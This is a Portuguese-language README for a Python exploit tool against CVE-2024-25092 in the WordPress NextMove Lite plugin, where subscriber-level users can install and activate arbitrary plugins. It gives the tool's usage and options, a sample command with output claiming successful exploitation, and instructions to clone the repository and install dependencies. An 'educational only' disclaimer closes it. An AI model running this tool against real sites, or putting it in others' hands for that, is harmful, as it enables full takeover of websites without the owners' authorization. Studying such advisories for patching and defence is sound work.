
Plugin WordPress NextMove Lite <= 2.17.0 - vulnerabilidade de instalação/ativação arbitrária de plugin por Subscriber+
CVE-2024-25092 é uma vulnerabilidade de alta gravidade que afeta o plugin NextMove Lite do WordPress (versões <= 2.17.0). Essa vulnerabilidade permite que um usuário com nível assinante (subscriber+) instale e ative plugins arbitrários em um site WordPress devido à ausência de verificações de autorização.
O plugin NextMove Lite da XLPlugins para WordPress possui uma vulnerabilidade de autorização ausente, permitindo que usuários autenticados com permissões de nível assinante ou superior realizem instalações e ativações arbitrárias de plugins. Isso pode levar ao comprometimento total do site WordPress.
O script Python fornecido automatiza a exploração desta vulnerabilidade, fazendo login no site WordPress e instalando um plugin especificado.
usage: CVE-2024-25092.py [-h] -u URL -un USERNAME -p PASSWORD [-pl PLUGIN]
Exploit script for CVE-2024-25092 By Nxploit Khaled Alenazi.
options:
-h, --help show this help message and exit
-u URL, --url URL Target URL
-un USERNAME, --username USERNAME
Username
-p PASSWORD, --password PASSWORD
Password
-pl PLUGIN, --plugin PLUGIN
Plugin to install (default: cart-for-woocommerce)
python CVE-2024-25092.py -u http://example.com -un admin -p password -pl custom-plugin
Logged in successfully.
Site is vulnerable... Exploiting and uploading plugin
Plugin 'cart-for-woocommerce' installed and activated successfully.
requestsClone o repositório:
git clone https://github.com/Nxploited/CVE-2024-25092.git
cd CVE-2024-25092
Instale os pacotes Python necessários:
pip install requests
Este script destina-se apenas a fins educacionais. Use-o com responsabilidade e somente em sistemas para os quais você tenha permissão explícita. O uso não autorizado deste script é ilegal e antiético.